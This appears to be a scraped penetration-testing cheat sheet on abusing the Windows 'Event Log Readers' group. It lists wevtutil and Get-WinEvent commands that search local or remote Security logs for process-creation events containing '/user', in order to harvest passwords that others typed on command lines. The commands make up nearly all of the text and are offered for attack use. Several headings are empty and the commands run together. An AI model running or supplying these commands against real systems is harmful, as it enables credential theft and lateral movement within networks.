Exploiting Event Log Readers Group for Security Log Access
Verify Group Membership:
net localgroup "Event Log Readers"Identify Audit Settings:
Query Security Logs using wevtutil:
wevtutil:wevtutil qe Security /rd:true /f:text | Select-String "/user"wevtutil qe Security /rd:true /f:text /r:<remote_host> /u:<user> /p:<password> | findstr "/user"Query Security Logs using Get-WinEvent:
Get-WinEvent:Get-WinEvent -LogName security | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}Get-WinEvent -LogName security -Credential <PSCredential> | Where-Object { $_.ID -eq 4688 -and $_.Properties[8].Value -like '*/user*'}Explore PowerShell Operational Logs:
Commands:
PowerShell Cmdlets:
Techniques:
Last updated